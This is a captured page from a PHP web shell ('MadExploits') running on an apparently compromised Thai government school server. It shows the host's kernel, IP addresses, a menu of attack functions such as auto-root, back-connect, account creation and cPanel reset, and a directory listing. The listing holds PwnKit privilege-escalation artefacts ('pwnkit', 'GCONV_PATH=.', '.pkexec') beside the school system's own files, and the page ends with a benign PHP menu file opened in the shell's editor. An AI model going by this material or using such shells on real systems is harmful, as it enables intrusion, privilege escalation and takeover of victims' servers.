Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
FusionCharts
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
ajax
[ DIR ]
drwxr-xr-x
alert
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
blocks
[ DIR ]
drwxr-xr-x
bootstrap-3.3.5-dist
[ DIR ]
drwxr-xr-x
bootstrap-4.3.1-dist
[ DIR ]
drwxr-xr-x
chart
[ DIR ]
drwxr-xr-x
ckeditor
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
datepicker_thaiyear
[ DIR ]
drwxr-xr-x
export
[ DIR ]
drwxr-xr-x
font
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
jquery
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
pdf
[ DIR ]
drwxr-xr-x
rss
[ DIR ]
drwxr-xr-x
signature
[ DIR ]
drwxr-xr-x
smss
[ DIR ]
drwxr-xr-x
themes
[ DIR ]
drwxr-xr-x
update
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
aminfo.php
19
B
-rwxr-xr-x
amss_smss_book.pdf
6.75
MB
-rw-r--r--
amssplus_connect.php
410
B
-rwxr-xr-x
banner_manaul.png
1.57
MB
-rw-r--r--
change_os.php
124
B
-rwxr-xr-x
favicon.ico
555
B
-rw-r--r--
index.php
2.47
KB
-rw-r--r--
index0.html
4.67
KB
-rwxr-xr-x
index_blocks.php
4.09
KB
-rw-r--r--
index_desktop.php
5.26
KB
-rwxr-xr-x
index_desktop11.php
3.45
KB
-rwxr-xr-x
index_mobile.php
3.35
KB
-rwxr-xr-x
index_mobile.php.save
3.35
KB
-rw-------
index_mobile11.php
1.9
KB
-rwxr-xr-x
login.php
4.04
KB
-rw-r--r--
login_.php
3.89
KB
-rwxr-xr-x
login_2.php
8.46
KB
-rw-r--r--
logout.php
129
B
-rwxr-xr-x
logout2.php
65
B
-rwxr-xr-x
main_js.js
1.63
KB
-rwxr-xr-x
mainfile.php
902
B
-rwxr-xr-x
menu.php
4.53
KB
-rwxr-xr-x
menu_mobile.php
3.12
KB
-rwxr-xr-x
php_errors.log
165.81
MB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
smss_index.php
160
B
-rwxr-xr-x
ss.php
7.07
KB
-rwxr-xr-x
version.php
31
B
-rw-r--r--
zoomit.zip
294.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : menu.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); ?> <tr bgcolor="#FFCC00"> <td colspan="5"> <ul id="nav" class="dropdown dropdown-horizontal"> <?php //** if(!($_SESSION['login_status']==5 or $_SESSION['login_status']==15)){ $sql_menugroup = "select * from system_menugroup order by menugroup_order"; $dbquery_menugroup = mysqli_query($connect,$sql_menugroup); While ($result_menugroup = mysqli_fetch_array($dbquery_menugroup)) { if($result_menugroup['menugroup']==1){ $menu_pic="<span class='fa fa-th-large'></span> "; } else if($result_menugroup['menugroup']==2){ $menu_pic="<span class='fab fa-btc'></span> "; } else if($result_menugroup['menugroup']==3){ $menu_pic="<span class='fa fa-user'></span> "; } else if($result_menugroup['menugroup']==4){ $menu_pic="<span class='fa fa-graduation-cap'></span> "; } else if($result_menugroup['menugroup']==5){ $menu_pic="<span class='fa fa-info-circle'></span> "; } else{ $menu_pic="<span class='fa fa-th-large'></span> "; } echo "<li>"; echo "<a href='./' class='dir'>$menu_pic$result_menugroup[menugroup_desc]</a>"; $sql_module = "select * from system_module where workgroup='$result_menugroup[menugroup]' and module_active='1' order by module_order"; $dbquery_module = mysqli_query($connect,$sql_module); echo "<ul>"; While ($result_module = mysqli_fetch_array($dbquery_module)){ if($result_module['menu_pic']!=""){ $pic=$result_module['menu_pic']; $sub_menu_pic="<span class='$pic'></span> "; } else{ $sub_menu_pic="<span class='fa fa-th'></span> "; } if(($_SESSION['login_status']<=5 or $_SESSION['login_status']==99) and ($result_module['where_work']<=1 or $result_module['where_work']==3)){ if($result_module['web_link']==1){ echo "<li><a href='$result_module[url]' target='_blank'>$sub_menu_pic$result_module[module_desc]</a></li>"; } else { echo "<li><a href='?option=$result_module[module]'>$sub_menu_pic$result_module[module_desc]</a></li>"; } if(!(isset($_SESSION['module_name_'.$result_module['module']]))){ $_SESSION['module_name_'.$result_module['module']]=$result_module['module_desc']; } } else if(($_SESSION['login_status']>10 and $_SESSION['login_status']<16) and ($result_module['where_work']<1 or $result_module['where_work']>1)){ if($result_module['web_link']==1){ echo "<li><a href='$result_module[url]' target='_blank'>$sub_menu_pic$result_module[module_desc]</a></li>"; } else { echo "<li><a href='?option=$result_module[module]'>$sub_menu_pic$result_module[module_desc]</a></li>"; } if(!(isset($_SESSION['module_name_'.$result_module['module']]))){ $_SESSION['module_name_'.$result_module['module']]=$result_module['module_desc']; } } else if(($_SESSION['login_status']==16) and ($result_module['where_work']==3)){ if($result_module['web_link']==1){ echo "<li><a href='$result_module[url]' target='_blank'>$sub_menu_pic$result_module[module_desc]</a></li>"; } else { echo "<li><a href='?option=$result_module[module]'>$sub_menu_pic$result_module[module_desc]</a></li>"; } if(!(isset($_SESSION['module_name_'.$result_module['module']]))){ $_SESSION['module_name_'.$result_module['module']]=$result_module['module_desc']; } } } echo "</ul>"; echo "</li>"; } } //end ** ?> <li><a href="./" class="dir"><span class='fa fa-user-circle'></span> ผู้ใช้ (User)</a> <ul> <?php if(!($_SESSION['login_status']==5 or $_SESSION['login_status']>=15)){ echo "<li><a href='?file=user_change_pwd'><span class='fas fa-pen'></span> เปลี่ยนรหัสผ่าน</a></li>"; } if($_SESSION['login_status']==5 or $_SESSION['login_status']==15){ echo "<li><a href='?file=register'><span class='fas fa-pen'></span> ลงทะเบียนผู้ใช้</a></li>"; } echo "<li><a href='?file=manual/amss_team'><span class='fa fa-envelope'></span> Mail ถึงทีมงานAMSS++</a></li>"; ?> </ul> </li> </ul> </td> <td align="right">Version <?php echo $_SESSION['system_version']; ?> </td> </tr>
Close